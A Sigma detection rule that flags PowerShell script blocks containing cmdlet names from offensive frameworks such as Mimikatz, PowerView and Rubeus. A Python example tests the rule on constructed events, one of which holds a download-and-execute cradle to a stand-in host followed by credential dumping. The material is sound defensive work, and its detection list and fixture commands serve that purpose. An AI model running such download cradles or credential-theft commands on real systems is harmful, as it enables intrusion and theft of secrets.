title: Malicious PowerShell Commandlets
id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
status: experimental
description: Detects Commandlet names from well-known PowerShell exploitation frameworks
references:
    - https://adsecurity.org/?p=2921
    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1
    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1
    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1
    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1
author: Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update), Nasreddine Bencherchali (update), Tim Shelton (fp), Mustafa Kaan Demir (update)
date: 2017/03/05
modified: 2022/10/28
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: Script Block Logging must be enabled
detection:
    select_Malicious:
        ScriptBlockText|contains:
            - 'Invoke-DllInjection'
            - 'Invoke-Shellcode'
            - 'Invoke-WmiCommand'
            - 'Get-GPPPassword'
            - 'Get-Keystrokes'
            - 'Get-TimedScreenshot'
            - 'Get-VaultCredential'
            - 'Invoke-CredentialInjection'
            - 'Invoke-Mimikatz'
            - 'Invoke-NinjaCopy'
            - 'Invoke-TokenManipulation'
            - 'Out-Minidump'
            - 'VolumeShadowCopyTools'
            - 'Invoke-ReflectivePEInjection'
            - 'Invoke-UserHunter'
            - 'Find-GPOLocation'
            - 'Invoke-ACLScanner'
            - 'Invoke-DowngradeAccount'
            - 'Get-ServiceUnquoted'
            - 'Get-ServiceFilePermission'
            - 'Get-ServicePermission'
            - 'Invoke-ServiceAbuse'
            - 'Install-ServiceBinary'
            - 'Get-RegAutoLogon'
            - 'Get-VulnAutoRun'
            - 'Get-VulnSchTask'
            - 'Get-UnattendedInstallFile'
            - 'Get-ApplicationHost'
            - 'Get-RegAlwaysInstallElevated'
            - 'Get-Unconstrained'
            - 'Add-RegBackdoor'
            - 'Add-ScrnSaveBackdoor'
            - 'Gupt-Backdoor'
            - 'Invoke-ADSBackdoor'
            - 'Enabled-DuplicateToken'
            - 'Invoke-PsUaCme'
            - 'Remove-Update'
            - 'Check-VM'
            - 'Get-LSASecret'
            - 'Get-PassHashes'
            - 'Show-TargetScreen'
            - 'Port-Scan'
            - 'Invoke-PoshRatHttp'
            - 'Invoke-PowerShellTCP'
            - 'Invoke-PowerShellWMI'
            - 'Add-Exfiltration'
            - 'Add-Persistence'
            - 'Do-Exfiltration'
            - 'Start-CaptureServer'
            - 'Get-ChromeDump'
            - 'Get-ClipboardContents'
            - 'Get-FoxDump'
            - 'Get-IndexedItem'
            - 'Get-Screenshot'
            - 'Invoke-Inveigh'
            - 'Invoke-NetRipper'
            - 'Invoke-EgressCheck'
            - 'Invoke-PostExfil'
            - 'Invoke-PSInject'
            - 'Invoke-RunAs'
            - 'MailRaider'
            - 'New-HoneyHash'
            - 'Set-MacAttribute'
            - 'Invoke-DCSync'
            - 'Invoke-PowerDump'
            - 'Exploit-Jboss'
            - 'Invoke-ThunderStruck'
            - 'Invoke-VoiceTroll'
            - 'Set-Wallpaper'
            - 'Invoke-InveighRelay'
            - 'Invoke-PsExec'
            - 'Invoke-SSHCommand'
            - 'Get-SecurityPackages'
            - 'Install-SSP'
            - 'Invoke-BackdoorLNK'
            - 'PowerBreach'
            - 'Get-SiteListPassword'
            - 'Get-System'
            - 'Invoke-BypassUAC'
            - 'Invoke-Tater'
            - 'Invoke-WScriptBypassUAC'
            - 'PowerUp'
            - 'PowerView'
            - 'Get-RickAstley'
            - 'Find-Fruit'
            - 'HTTP-Login'
            - 'Find-TrustedDocuments'
            - 'Invoke-Paranoia'
            - 'Invoke-WinEnum'
            - 'Invoke-ARPScan'
            - 'Invoke-PortScan'
            - 'Invoke-ReverseDNSLookup'
            - 'Invoke-SMBScanner'
            - 'Invoke-Mimikittenz'
            - 'Invoke-AllChecks'
            - 'Invoke-BadPotato'
            - 'Invoke-BetterSafetyKatz'
            - 'Invoke-Carbuncle'
            - 'Invoke-Certify'
            - 'Invoke-DAFT'
            - 'Invoke-DinvokeKatz'
            - 'Invoke-Eyewitness'
            - 'Invoke-FakeLogonScreen'
            - 'Invoke-Farmer'
            - 'Invoke-Get-RBCD-Threaded'
            - 'Invoke-Gopher'
            - 'Invoke-Grouper2'
            - 'Invoke-HandleKatz'
            - 'Invoke-Internalmonologue'
            - 'Invoke-KrbRelayUp'
            - 'Invoke-LdapSignCheck'
            - 'Invoke-Lockless'
            - 'Invoke-MITM6'
            - 'Invoke-NanoDump'
            - 'Invoke-OxidResolver'
            - 'Invoke-P0wnedshell'
            - 'Invoke-PPLDump'
            - 'Invoke-Rubeus'
            - 'Invoke-SCShell'
            - 'Invoke-SafetyKatz'
            - 'Invoke-SauronEye'
            - 'Invoke-Seatbelt'
            - 'Invoke-SharPersist'
            - 'Invoke-SharpAllowedToAct'
            - 'Invoke-SharpBlock'
            - 'Invoke-SharpBypassUAC'
            - 'Invoke-SharpChromium'
            - 'Invoke-SharpClipboard'
            - 'Invoke-SharpCloud'
            - 'Invoke-SharpDPAPI'
            - 'Invoke-SharpDump'
            - 'Invoke-SharpGPO-RemoteAccessPolicies'
            - 'Invoke-SharpGPOAbuse'
            - 'Invoke-SharpHandler'
            - 'Invoke-SharpHide'
            - 'Invoke-SharpHound4'
            - 'Invoke-SharpImpersonation'
            - 'Invoke-SharpImpersonationNoSpace'
            - 'Invoke-SharpKatz'
            - 'Invoke-SharpLdapRelayScan'
            - 'Invoke-SharpLoginPrompt'
            - 'Invoke-SharpMove'
            - 'Invoke-SharpPrintNightmare'
            - 'Invoke-SharpPrinter'
            - 'Invoke-SharpRDP'
            - 'Invoke-SharpSSDP'
            - 'Invoke-SharpSecDump'
            - 'Invoke-SharpSniper'
            - 'Invoke-SharpSploit'
            - 'Invoke-SharpSpray'
            - 'Invoke-SharpStay'
            - 'Invoke-SharpUp'
            - 'Invoke-SharpWatson'
            - 'Invoke-Sharphound2'
            - 'Invoke-Sharphound3'
            - 'Invoke-Sharplocker'
            - 'Invoke-Sharpshares'
            - 'Invoke-Sharpview'
            - 'Invoke-Sharpweb'
            - 'Invoke-Snaffler'
            - 'Invoke-Spoolsample'
            - 'Invoke-StandIn'
            - 'Invoke-StickyNotesExtract'
            - 'Invoke-Thunderfox'
            - 'Invoke-Tokenvator'
            - 'Invoke-UrbanBishop'
            - 'Invoke-Whisker'
            - 'Invoke-WireTap'
            - 'Invoke-winPEAS'
            - 'Invoke-Zerologon'
            - 'Get-USBKeystrokes'
            - 'Start-WebcamRecorder'
            - 'Invoke-OfficeScrape'
            - 'Invoke-DomainPasswordSpray'
            - 'Invoke-SpraySinglePassword'
    false_positive1:
        ScriptBlockText|contains:
            - Get-SystemDriveInfo # http://bheltborg.dk/Windows/WinSxS/amd64_microsoft-windows-maintenancediagnostic_31bf3856ad364e35_10.0.10240.16384_none_91ef7543a4514b5e/CL_Utility.ps1
            - C:\ProgramData\Amazon\EC2-Windows\Launch\Module\ # false positive from Amazon EC2
    false_positive2:
        ScriptBlockText|startswith: '# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved'
    condition: select_Malicious and not 1 of false_positive*
falsepositives:
    - Unknown
level: high
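To show how the detection section evaluates in practice, the following is an added Python example; it is not part of the Sigma rule or the Sigma project. It applies the rule's `|contains` and `|startswith` matching (case-insensitive, which is Sigma's default for string modifiers) and the condition `select_Malicious and not 1 of false_positive*` to a few constructed Event ID 4104 script block events. Only a subset of the rule's cmdlet list is embedded, the host names and script bodies are invented, and the EC2Launch sample is a stand-in that merely starts with the copyright line the filter keys on, not the real module.

```python
"""Evaluate the detection section of the Sigma rule above against
constructed PowerShell Script Block Logging events (Event ID 4104).

Added example; not code from the Sigma rule or its repository. The
cmdlet list is a representative subset of the rule's select_Malicious
list, and the sample events are constructed for illustration.
"""

# Subset of the rule's select_Malicious list (assumption: representative, not exhaustive).
MALICIOUS_CMDLETS = [
    "Invoke-Mimikatz", "Invoke-DCSync", "Get-GPPPassword", "Invoke-Rubeus",
    "Invoke-SharpHound4", "Invoke-DomainPasswordSpray", "Invoke-Zerologon",
    "PowerView", "Get-System",
]

# false_positive1: ScriptBlockText|contains (taken verbatim from the rule)
FP_CONTAINS = [
    "Get-SystemDriveInfo",
    "C:\\ProgramData\\Amazon\\EC2-Windows\\Launch\\Module\\",
]
# false_positive2: ScriptBlockText|startswith (taken verbatim from the rule)
FP_STARTSWITH = "# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved"


def contains_any(text, needles):
    """Sigma |contains over a list is OR; string matching is case-insensitive
    unless |cased is added, so compare lower-cased. Returns the needles hit."""
    lowered = text.lower()
    return [n for n in needles if n.lower() in lowered]


def starts_with(text, prefix):
    """Sigma |startswith, case-insensitive like |contains."""
    return text.lower().startswith(prefix.lower())


def evaluate(event):
    """Apply 'select_Malicious and not 1 of false_positive*' to one event.
    Returns which cmdlet patterns fired and whether the rule alerts."""
    sbt = event.get("ScriptBlockText", "")
    matched = contains_any(sbt, MALICIOUS_CMDLETS)
    select_malicious = bool(matched)
    fp1 = bool(contains_any(sbt, FP_CONTAINS))
    fp2 = starts_with(sbt, FP_STARTSWITH)
    any_fp = fp1 or fp2  # "1 of false_positive*": any filter selection matches
    return {
        "alert": select_malicious and not any_fp,
        "matched": matched,
        "suppressed": select_malicious and any_fp,
    }


# Constructed sample 4104 events (not captured from a real host).
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "WS01",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/m.ps1'); Invoke-Mimikatz -DumpCreds"},
    {"EventID": 4104, "Computer": "WS02",
     "ScriptBlockText": "invoke-dcsync -Domain corp.example -Username krbtgt"},
    # Built-in troubleshooting script whose function name contains 'Get-System'
    {"EventID": 4104, "Computer": "WS03",
     "ScriptBlockText": "function Get-SystemDriveInfo { Get-PSDrive -Name C }"},
    # Constructed stand-in for an EC2Launch module block (not the real file)
    {"EventID": 4104, "Computer": "EC2-01",
     "ScriptBlockText": "# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved\r\nfunction Get-SystemInfo { Get-ComputerInfo }"},
    {"EventID": 4104, "Computer": "WS04",
     "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'"},
]


def run(events=SAMPLE_EVENTS):
    """Return (alerts, suppressed): alerting hosts with their hits, and hosts
    whose match was removed by a false_positive* selection."""
    alerts, suppressed = [], []
    for ev in events:
        result = evaluate(ev)
        if result["alert"]:
            alerts.append((ev["Computer"], result["matched"]))
        elif result["suppressed"]:
            suppressed.append(ev["Computer"])
    return alerts, suppressed


if __name__ == "__main__":
    alerts, suppressed = run()
    for host, hits in alerts:
        print(f"ALERT    {host}: {', '.join(hits)}")
    for host in suppressed:
        print(f"FILTERED {host}: matched but excluded by false_positive*")
```

Two points the sample makes visible. First, `Get-SystemDriveInfo` is excluded precisely because `contains` is a substring test: the benign Windows diagnostic function carries `Get-System` inside its name, which is why the rule needs that filter at all. Second, the `startswith` filter for the EC2Launch copyright header only suppresses a script block whose text begins with that line; Script Block Logging splits large scripts into several 4104 events ("Creating Scriptblock text (n of N)"), and only the first fragment starts with the header, so later fragments of the same file would still be judged by `select_Malicious` alone. Conversely, because matching is on unmodified cmdlet names, any attacker who renames the function in their copy of the tooling falls outside this rule; treat it as a low-effort catch for stock tooling rather than a complete control.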